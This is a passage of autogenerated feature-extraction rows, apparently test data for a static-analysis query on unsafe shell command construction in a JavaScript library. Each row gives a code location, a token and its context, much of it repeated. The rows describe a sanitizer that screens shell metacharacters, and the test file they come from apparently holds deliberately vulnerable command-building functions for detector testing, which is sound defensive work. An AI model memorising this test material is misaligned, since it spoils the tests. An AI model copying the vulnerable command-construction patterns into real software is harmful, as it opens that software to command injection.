autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:16 | s[i] === '\\\\' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:16 | s[i] === '\\\\' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:16 | s[i] === '\\\\' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:16 | s[i] === '\\\\' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:16 | s[i] === '\\\\' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:6:393:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:6:393:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:6:393:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:6:393:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:6:393:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:13:393:16 | '\\\\' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:13:393:16 | '\\\\' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:13:393:16 | '\\\\' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:13:393:16 | '\\\\' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:13:393:16 | '\\\\' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:16 | s[i] === '\\t' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:16 | s[i] === '\\t' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:16 | s[i] === '\\t' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:16 | s[i] === '\\t' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:4:394:16 | s[i] === '\\t' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:6:394:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:6:394:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:6:394:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:6:394:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:6:394:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:13:394:16 | '\\t' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:13:394:16 | '\\t' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:13:394:16 | '\\t' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:13:394:16 | '\\t' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:394:13:394:16 | '\\t' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:16 | s[i] === '\\n' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:16 | s[i] === '\\n' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:16 | s[i] === '\\n' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:16 | s[i] === '\\n' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:4:395:16 | s[i] === '\\n' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:6:395:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:6:395:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:6:395:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:6:395:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:6:395:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:13:395:16 | '\\n' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:13:395:16 | '\\n' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:13:395:16 | '\\n' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:13:395:16 | '\\n' | enclosingFunctionName | yetAnohterSanitizer | +| 